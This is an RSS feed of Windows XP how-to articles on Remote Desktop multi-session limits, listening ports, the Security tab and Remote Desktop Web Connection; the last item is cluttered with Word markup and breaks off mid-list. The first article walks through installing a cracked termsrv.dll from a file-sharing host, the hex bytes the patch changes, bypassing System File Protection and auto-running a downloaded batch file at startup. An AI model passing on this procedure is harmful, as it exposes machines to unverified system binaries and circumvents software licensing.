<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
    xmlns:admin="http://webns.net/mvcb/"
    xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
    xmlns:content="http://purl.org/rss/1.0/modules/content/">

    <channel>
    
    <title>Windows XP | Program IN KB</title>

    <link>http://www.kb.programin.co.rs/</link>
    <description>Just another KB</description>
    <dc:language>en-ca</dc:language>
    <dc:creator>igor.trpcevic@gmail.com</dc:creator>

    <dc:rights>Copyright 2026</dc:rights>
    <admin:generatorAgent rdf:resource="http://www.codeigniter.com/" />

        
        <item>

          <title>Enable Multiple Concurrent Remote Desktop Connections or Sessions in Windows XP</title>
          <link>http://www.kb.programin.co.rs/index.php/article/enable-multiple-concurrent-remote-desktop-connections-o</link>
          <guid>http://www.kb.programin.co.rs/index.php/article/enable-multiple-concurrent-remote-desktop-connections-o</guid>

          <description><![CDATA[
      <p>Windows XP Professional and Windows XP Media Center Edition (MCE) has
 Remote Desktop (RDP) service that allows the computer to be remotely 
connected, accessed and controlled from another computer or host. 
However, Windows XP machine only allows one concurrent remote desktop 
connection from a single user been connected to it with no multiple 
remote desktop sessions or connections support.<br>
<span id="more-7687"></span><br>
Whenever there is a remote user who user Remote Desktop Connection (RDC)
 client to connect to a Windows XP host, the local user is disconnected 
with the local console screen locked, with or without his or her 
permission. Remote Desktop, unlike Terminal Server Services in Windows 
2000, Server 2003 and Server 2008, is designed for single user use only,
 no matter it’s local or remote user.</p>
<p>Here’s a hack to unlock the single user limitation and enable 
multiple concurrent remote desktop connection sessions support in 
Windows XP Professional and Media Center Edition, using a either a 
patched termserv.dll or old patched cracked termserv.dll build version 
version 5.1.2600.2055, so that unlimited users can simultaneously 
connect to a computer via Remote Desktop.</p>
<ol><li>Download a copy of patched termsrv.dll (in ZIP file) which has the 
Remote Desktop connection limitation deactivated for your version of 
Windows XP:
<p>Windows XP RTM, SP1 and SP2: <a href="http://www.ziddu.com/download.php?uid=ZrGcmpuuZrKZmpmtsqyZlJyiZLCWlZWt4">termsrv.dll (version 5.1.2600.2055)<br></a>
Windows XP SP2: <a href="http://www.ziddu.com/download.php?uid=abCflpqtarKZmpens6yZlJyiZbCWlZWt5">termsrv.dll (version 5.1.2600.2180)</a><br>
Windows XP SP3: <a href="http://www.ziddu.com/download.php?uid=brOalJurbLKfl5ytafiblJStZKqfkZWmaQ==7">termsrv.dll (version 5.1.2600.5512)</a></p>
<p>For information, the termsrv.dll patch normally has the following HEX
 code bits overwritten with following value:</p>
<p>00022A17: 74 75<br>
00022A69: 7F 90<br>
00022A6A: 16 90</p>
</li><li>Restart the computer and boot info Safe Mode by pressing <strong>F8</strong>
 during initial boot up and select <strong>Safe Mode</strong>. This step
 is only required if you’re currently running Windows Terminal Services 
or Remote Desktop service, and System File Protection has to be skipped 
and bypassed, else it will prompt the following error message to restore
 the original termsrv.dll.

</li><li>Go to <strong>%windir%\System32</strong> and make a backup copy (or 
rename) the <strong>termsrv.dll</strong>.</li><li>Rename or delete the <strong>termserv.dll</strong> in the <strong>%windir%\System32\dllcache</strong>
 folder.</li><li>Copy the downloaded <strong>termsrv.dll</strong> into <strong>%windir%\System32</strong>,
 <strong>%windir%\ServicePackFiles\i386</strong> (if exist) and <strong>%windir%\System32\dllcache</strong>.</li><li>Then download and run the <a href="http://www.ziddu.com/download.php?uid=ZrCcmZipZLGimZmnsqyZlJyiZLCWlZWn4">ts_multiple_sessions.bat</a> (in ZIP file) to merge the 
registry value into registery, or you can run Registry Editor to 
manually add the following registry value:
<p>[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal 
Server\Licensing Core]<br>
“EnableConcurrentSessions”=dword:00000001</p>
<p>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Winlogon]<br>
“EnableConcurrentSessions”=dword:00000001</p>
<p>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Winlogon]<br>
“AllowMultipleTSSessions”=dword:00000001</p>
</li><li>Click on <strong>Start Menu</strong> -&gt; <strong>Run</strong> 
command and type <strong>gpedit.msc</strong>, follow by <strong>Enter</strong>
 to open up the Group Policy Editor.</li><li>Navigate to <strong>Computer Configuration</strong> -&gt; <strong>Administrative
 Templates</strong> -&gt; <strong>Windows Components</strong> -&gt; <strong>Terminal
 Services</strong>.</li><li>Enable <strong>Limit Number of Connections</strong> and set the 
number of connections to <strong>3</strong> (or more). The setting 
allows more than one users to use the computer and logged on at the same
 time.</li><li>Ensure the Remote Desktop is enabled in System Properties’ Remote 
tab by selecting the radio button for <strong>Allow users to connect 
remotely to this computer</strong>.</li><li>Enable and turn on <strong>Fast User Switching</strong> in <strong>Control
 Panel</strong> -&gt; <strong>User Accounts</strong> -&gt; <strong>Change
 the way users log on or off</strong>.
</li><li>Restart the computer normally.</li></ol>
<p>Note that if you cannot replace or overwrite termserv.dll with access
 denied or file in use error, turn off the “Termine Services” in 
“Services” control panel of “Administrator Tools”. Besides, each 
connecting physical connections must have their own user account in the 
target host, and must authenticate with corresponding own user name and 
password credential. </p>
<p>To uninstall and revert back to original termsrv.dll, simply delete 
the patched version, and rename the backup copy back to “termsrv.dll”. 
You probably have to do it in Safe Mode if the Terminal Services is 
enabled and running.</p>
<p>If the Windows XP computer is connected to a domain on local 
networks, Windows will set the value of the regkey 
“AllowMultipleTSSessions” to “0″ every time the computer is restarted. 
To ensure that multiple or unlimited Remote Desktop connection sessions 
is allowed in AD domain environment, the value data for 
“AllowMultipleTSSessions” has to be set to “1″ on each system startup. 
To change the value, simply rerun the <strong>ts_multiple_sessions.bat</strong>
 every time the computer is started. Alternatively, put the <strong>ts_multiple_sessions.bat</strong>
 at <strong>C:\Documents and Settings\All Users\Start 
Menu\Programs\Startup</strong> folder so that it will be automatically 
run on first user with administrative privileges that logs on to the 
desktop. Another workaround is to install additional service or define a
 sub-key in <strong>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</strong>
 registry branch that run the registry batch file automatically on boot 
up, and this is useful if the computer won’t be logged on by anybody, 
but still requires the hack to allow unlimited Remote Desktop users to 
work.</p>
<p>Another issue is that if user closes the remote connection instead of
 logging off, when he or she tries to log back in, an error message 
related to TCP/IP event ID 4226 may occur. To resolve the issue, 
download and apply the Windows XP TCP/IP connection limit and Event ID 
4226 patch, and set the connections to at least 50.</p>      ]]></description>
      <pubDate>Wed, 11 Aug 2010 11:55:42 +0000</pubDate>
        </item>

        
        
        <item>

          <title>Modify and Change Remote Desktop Listening Port</title>
          <link>http://www.kb.programin.co.rs/index.php/article/modify-and-change-remote-desktop-listening-port</link>
          <guid>http://www.kb.programin.co.rs/index.php/article/modify-and-change-remote-desktop-listening-port</guid>

          <description><![CDATA[
      <p>Remote Desktop is a multi-channel protocol that allows a user to 
remote access or connect to a computer which has enabled Remote Desktop 
server from another remote computer, through Local Area Network (LAN), 
Wide Area Network (WAN) or Internet by using Remote Desktop Connection 
client program. Microsoft Remote Desktop Protocol (RDP) server 
application can be found pre-installed on Windows Server 2003, Microsoft
 Windows XP Professional, Microsoft Windows XP Media Center Edition 
(MCE), Microsoft Windows XP Tablet PC<a id="KonaLink0" target="undefined" class="kLink" style="text-decoration: underline ! important; position: static;" href="http://www.mydigitallife.info/2006/12/04/modify-and-change-remote-desktop-listening-port/#"><font style="color: blue ! important; font-size: 13px; position: static;" color="blue"><span class="kLink" style="color: blue ! important;"></span></font></a> 2005 Edition, Windows Vista 
Ultimate, and Windows Vista Business Edition. By default, Remote Desktop
 is using port 3389 TCP (UDP to stream audio redirection) as the 
listening port for any incoming Remote Desktop connections.<br>
<span id="more-1884"></span><br>
Although Remote Desktop server is using the default listening port of 
3389 TCP and UDP, it’s possible to modify or change the listening port 
of Remote Desktop to another port. It’s especially useful when the 
remote computer is behind firewall which doesn’t allow incoming and 
outgoing connections other than standard ports (Windows Firewall in 
Windows XP Service Pack 2 (SP2) will automatically configure and open 
required ports when user enable Remote Desktop to allow Remote Desktop 
connections to the computer, if Don’t Allow Exceptions is not selected, 
else user will need to manually open the Remote Desktop port in Internet
 Connection Firewall on Windows XP SP 1 or earlier), or users unable to 
configure the port forwarding for Remote Desktop if they’re behind 
firewall or router’s NAT.</p>
<p><strong>How to Change the Listening Port for Remote Desktop</strong></p>
<p>Microsoft has a <a href="http://support.microsoft.com/kb/306759">Knowledge
 Base article KB306759</a> that details how to modify and change the 
Remote Desktop listening port by changing registry value.</p>
<ol><li>Start Registry Editor by clicking on Start -&gt; Run, and type in 
regedit in the Run text box, and then press Enter or click OK.</li><li>Navigate to the following registry branch/subkey:
<p>HKEY_LOCAL_MACHINE\System\CurrentControlSet\<br>
Control\TerminalServer\WinStations\RDP-Tcp\</p>
</li><li>Locate the registry entry PortNumber in the right pane.</li><li>Right click on PortNumber and choose Modify (or select PortNumber, then 
click on Edit menu and select Modify).</li><li>On the Edit DWORD Value window, click on Decimal.</li><li>Type in the new port number on the Value Data text box.</li><li>Click OK when done.</li></ol>
<p>If you don’t want to mess or modify in the Windows registry yourself,
 IntelliAdmin has a small free utility tool <a href="http://www.intelliadmin.com/RDPRemotePortChange.exe">Remote 
Desktop Port Change (RDPRemotePortChange.exe)</a> that allows users to 
change the Remote Desktop listening port on local computer or on remote 
computer across the LAN.</p>
<p><br></p>
<p>To change listening port for Remote Desktop for local PC (the 
computer that you’re using now), simply select Local System, or select 
Remote Computer for other computer and key in the desired computer name 
or IP plus authentication user name and password to change the listening
 port. Configure the required settings i.e. the new port number for 
Remote Desktop, and whether to reboot the PC after the change, and 
simply press Submit.</p>
<p>Note that Remote Assistance feature in Microsoft Windows XP may not 
work correctly if the the listening port of Remote Desktop has been 
changed. Beside, when want to connect or remote control this particular 
computer with non standard listing port by using the Remote Desktop 
connection from remote computer, the port number must be specifed together with computer host name or IP address ( ie hostname:3389) to connect to that specific port.</p>      ]]></description>
      <pubDate>Wed, 11 Aug 2010 13:03:04 +0000</pubDate>
        </item>

        
        
        <item>

          <title>Enable and Display Security Tab in Windows XP Home Edition</title>
          <link>http://www.kb.programin.co.rs/index.php/article/enable-and-display-security-tab-in-windows-xp-home-edit</link>
          <guid>http://www.kb.programin.co.rs/index.php/article/enable-and-display-security-tab-in-windows-xp-home-edit</guid>

          <description><![CDATA[
      <p>Unlike Microsoft Windows XP Professional where the security tabs for the 
folders and drives have been hidden and needs to be enable with certain tricks, Windows XP Home edition by default doesn’t have the security tabs 
that allows users to configure and change the permissions and rights for Windows 
folders and drives.<br><span id="more-1299"></span><br>To unhide, view and display 
the Security Tab in Windows XP Home edition operating system, Security 
Configuration Manager Tool needs to be used. Security Configuration Manager Tool 
is a tool set to configure security for a Windows NT-based or Windows 2000-based 
computer. SCM has other features too such as perform periodic analysis of the 
computer to ensure that the configuration remains intact or to make necessary 
changes over time.</p>
<ol><li>Download Security Configuration Manager Tool (x86 (Intel version) is 
SCESP4I.EXE) from <a href="http://support.microsoft.com/?kbid=245216">Microsoft</a>. 
</li><li>Double click the SCESP4I.EXE and extract the contents to a folder on your 
hard disk. 
</li><li>Go to the folder where the SCESP4I.exe contents are extracted, locate the 
Setup.inf (Setup Information) file. 
</li><li>Right click on Setup.inf and select Install. 
</li><li>Reboot computer after installation finished. </li></ol>
<p>You can now see the security tab when you view the properties for the drive, 
file or folder. Warning though, misconfigured permissions will make your drives, 
files and folders inaccessible to everybody, including Administrator account 
will also be locked out from the resources. Beside, some advice on permissions 
setting is that Deny Permissions take precedence over Allow Permissions, 
regardless of your group membership, and Administrators are members of the 
User’s group, by default. So if you deny access to the User’s group, 
Administrators won’t be able to access too. So, try to Uncheck Allow, rather 
than using Deny.</p>      ]]></description>
      <pubDate>Wed, 11 Aug 2010 13:08:59 +0000</pubDate>
        </item>

        
        
        <item>

          <title>Missing or No Security Tab Found in Windows XP Professional</title>
          <link>http://www.kb.programin.co.rs/index.php/article/missing-or-no-security-tab-found-in-windows-xp-professi</link>
          <guid>http://www.kb.programin.co.rs/index.php/article/missing-or-no-security-tab-found-in-windows-xp-professi</guid>

          <description><![CDATA[
      <p>Security tab for the properties of files or folders in Windows XP 
Professional is the important functionality that enable administrators and users 
to define security permissions and rights for particular user or group to the 
computer resources. By default, Windows XP Professional follows recommended 
setting to enable the use of simple file sharing that hide the Security tab, 
leaving you with only General, Sharing, Web Sharing &amp; Customize tabs as in 
the Simple File Sharing UI.<br><span id="more-1233"></span><br>So to see and 
unhide the Security tab, just use the following steps:</p>
<ol><li>Launch Windows Explorer or My Computer. 
</li><li>Click on the Tools at the menu bar, then click on Folder Options. 
</li><li>Click on View tab. 
</li><li>In the Advanced Settings section at the bottom of the list, uncheck and 
unselect (clear the tick) on the “Use simple file sharing (Recommended)” check 
box. 
</li><li>Click OK. </li></ol>
<p>Security tab is available only to Administrator or users with administrative 
rights. So make sure you login as one. And security can only be set in an NTFS 
partition. If you’re still having problem to reveal or display the Security tab 
on files or folder properties, check out the following registry hack and set the 
value to 0 or simply delete the key:</p>
<p>Hive: HKEY_CURRENT_USER<br>Key: 
Software\Microsoft\windows\CurrentVersion\Policies\Explorer<br>Name: 
Nosecuritytab<br>Type: REG_DWORD<br>Value: 1</p>
<p>If you’re using a Windows XP Professional system that is installed in a 
Workgroup, the Security tab is also hidden by default because in Windows XP Home 
Edition and Windows XP Professional, guests are forced to log on to a workgroup. 
Follow the instruction and information on <a href="http://support.microsoft.com/?kbid=290403">Microsoft Knowledge Base</a> 
where you need to set the value for ForceGuest registry key.<ins style="padding: 0px; visibility: visible; margin: 0px; width: 300px; border-style: none; position: relative; height: 250px;"></ins></p>      ]]></description>
      <pubDate>Wed, 11 Aug 2010 13:10:05 +0000</pubDate>
        </item>

        
        
        <item>

          <title>Set Up Remote Desktop Web Connection with Windows XP</title>
          <link>http://www.kb.programin.co.rs/index.php/article/set-up-remote-desktop-web-connection-with-windows-xp</link>
          <guid>http://www.kb.programin.co.rs/index.php/article/set-up-remote-desktop-web-connection-with-windows-xp</guid>

          <description><![CDATA[
      <w:worddocument><w:trackformatting><w:punctuationkerning><w:validateagainstschemas><w:donotpromoteqf><w:compatibility><w:breakwrappedtables><w:snaptogridincell><w:wraptextwithpunct><w:useasianbreakrules><w:dontgrowautofit><w:splitpgbreakandparamark><w:dontvertaligncellwithsp><w:dontbreakconstrainedforcedtables><w:dontvertalignintxbx><w:word11kerningpairs><m:mathpr><m:mathfont m:val="Cambria Math"><m:brkbin m:val="before"><m:brkbinsub m:val="--"><m:smallfrac m:val="off"><m:dispdef><m:lmargin m:val="0"><m:rmargin m:val="0"><m:defjc m:val="centerGroup"><m:wrapindent m:val="1440"><w:latentstyles deflockedstate="false" defunhidewhenused="true" defsemihidden="true" defqformat="false" defpriority="99" latentstylecount="267"><w:lsdexception locked="false" priority="0" semihidden="false" unhidewhenused="false" qformat="true" name="Normal"><w:lsdexception locked="false" priority="9" semihidden="false" unhidewhenused="false" qformat="true" name="heading 1"><w:lsdexception locked="false" priority="9" qformat="true" name="heading 2"><w:lsdexception locked="false" priority="9" qformat="true" name="heading 3"><w:lsdexception locked="false" priority="9" qformat="true" name="heading 4"><w:lsdexception locked="false" priority="9" qformat="true" name="heading 5"><w:lsdexception locked="false" priority="9" qformat="true" name="heading 6"><w:lsdexception locked="false" priority="9" qformat="true" name="heading 7"><w:lsdexception locked="false" priority="9" qformat="true" name="heading 8"><w:lsdexception locked="false" priority="9" qformat="true" name="heading 9"><w:lsdexception locked="false" priority="39" name="toc 1"><w:lsdexception locked="false" priority="39" name="toc 2"><w:lsdexception locked="false" priority="39" name="toc 3"><w:lsdexception locked="false" priority="39" name="toc 4"><w:lsdexception locked="false" priority="39" name="toc 5"><w:lsdexception locked="false" priority="39" name="toc 6"><w:lsdexception locked="false" priority="39" name="toc 7"><w:lsdexception locked="false" priority="39" name="toc 8"><w:lsdexception locked="false" priority="39" name="toc 9"><w:lsdexception locked="false" priority="35" qformat="true" name="caption"><w:lsdexception locked="false" priority="10" semihidden="false" unhidewhenused="false" qformat="true" name="Title"><w:lsdexception locked="false" priority="1" name="Default Paragraph Font"><w:lsdexception locked="false" priority="11" semihidden="false" unhidewhenused="false" qformat="true" name="Subtitle"><w:lsdexception locked="false" priority="22" semihidden="false" unhidewhenused="false" qformat="true" name="Strong"><w:lsdexception locked="false" priority="20" semihidden="false" unhidewhenused="false" qformat="true" name="Emphasis"><w:lsdexception locked="false" priority="59" semihidden="false" unhidewhenused="false" name="Table Grid"><w:lsdexception locked="false" unhidewhenused="false" name="Placeholder Text"><w:lsdexception locked="false" priority="1" semihidden="false" unhidewhenused="false" qformat="true" name="No Spacing"><w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading"><w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List"><w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid"><w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1"><w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2"><w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1"><w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2"><w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1"><w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2"><w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3"><w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List"><w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading"><w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List"><w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid"><w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 1"><w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 1"><w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 1"><w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 1"><w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 1"><w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 1"><w:lsdexception locked="false" unhidewhenused="false" name="Revision"><w:lsdexception locked="false" priority="34" semihidden="false" unhidewhenused="false" qformat="true" name="List Paragraph"><w:lsdexception locked="false" priority="29" semihidden="false" unhidewhenused="false" qformat="true" name="Quote"><w:lsdexception locked="false" priority="30" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Quote"><w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 1"><w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 1"><w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 1"><w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 1"><w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 1"><w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 1"><w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 1"><w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 1"><w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 2"><w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 2"><w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 2"><w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 2"><w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 2"><w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 2"><w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 2"><w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 2"><w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 2"><w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 2"><w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 2"><w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 2"><w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 2"><w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 2"><w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 3"><w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 3"><w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 3"><w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 3"><w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 3"><w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 3"><w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 3"><w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 3"><w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 3"><w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 3"><w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 3"><w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 3"><w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 3"><w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 3"><w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 4"><w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 4"><w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 4"><w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 4"><w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 4"><w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 4"><w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 4"><w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 4"><w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 4"><w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 4"><w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 4"><w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 4"><w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 4"><w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 4"><w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 5"><w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 5"><w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 5"><w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 5"><w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 5"><w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 5"><w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 5"><w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 5"><w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 5"><w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 5"><w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 5"><w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 5"><w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 5"><w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 5"><w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 6"><w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 6"><w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 6"><w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 6"><w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 6"><w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 6"><w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 6"><w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 6"><w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 6"><w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 6"><w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 6"><w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 6"><w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 6"><w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 6"><w:lsdexception locked="false" priority="19" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Emphasis"><w:lsdexception locked="false" priority="21" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Emphasis"><w:lsdexception locked="false" priority="31" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Reference"><w:lsdexception locked="false" priority="32" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Reference"><w:lsdexception locked="false" priority="33" semihidden="false" unhidewhenused="false" qformat="true" name="Book Title"><w:lsdexception locked="false" priority="37" name="Bibliography">You don't have to carry a laptop to
have your computer available wherever you go, because Windows XP Professional
includes Remote Desktop. Remote Desktop gives you complete control over your
computer from across a network and over the Internet. However, Remote Desktop
requires software to be installed on the system you're connecting from.
Unfortunately, it's often impossible to install the software on a system, such
as when you're at an Internet café, a friend's house, or using a client's
computer.<o:p></o:p>

<p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">The solution is to use <span style="color: blue;">Remote Desktop Web Connection</span>, which loads the
Remote Desktop client within a browser. The Remote Desktop Web Connection is a
perfect solution for connecting to your home or office PC when you can't
install the Remote Desktop client software on a computer. By pointing a browser
that supports ActiveX controls at a host computer running Windows XP
Professional, you can access your remote desktop over the Internet.<o:p></o:p></span></p>

<p class="MsoNormal" style="line-height: normal;"><a name="E4B"></a><span style="font-size: 18pt;" times="" new="" roman="" ,="" serif="" ;="">Get Your Host Computer Ready<o:p></o:p></span></p>

<p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">The Remote Desktop feature is only
available in Windows XP Professional. It's not included with Windows XP Home
Edition.<o:p></o:p></span></p>

<p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">The first step in enabling Remote
Desktop Web Connection is to install the necessary software on the host
computer. Remote Desktop Web Connection is an optional World Wide Web Service
component of Internet Information Services (IIS), which is included by default in
Windows XP Professional. IIS responds to requests from a Web browser. Have your
Windows XP Professional CD handy, and follow these steps:<o:p></o:p></span></p>

<table class="MsoNormalTable" style="" border="0" cellpadding="0" cellspacing="0">
 <tbody><tr style="">
  <td style="padding: 0mm;" valign="top" nowrap="nowrap">
  <p class="MsoNormal" style="text-align: right; line-height: normal;" align="right"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">1.<o:p></o:p></span></p>
  </td>
  <td style="padding: 0mm;" valign="top">
  <p class="MsoNormal" style="line-height: normal;"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">Open Control Panel click Add
  or Remove Programs, and then click Add/Remove Windows Components. <o:p></o:p></span></p>
  </td>
 </tr>
 <tr style="">
  <td style="padding: 0mm;" valign="top" nowrap="nowrap">
  <p class="MsoNormal" style="text-align: right; line-height: normal;" align="right"><span style="font-size: 12pt;" times="" new="" roman="" ,="" serif="" ;="">2.<o:p></o:p></span></p>
  </td>
  <td style="padding: 0mm;" valign="top">
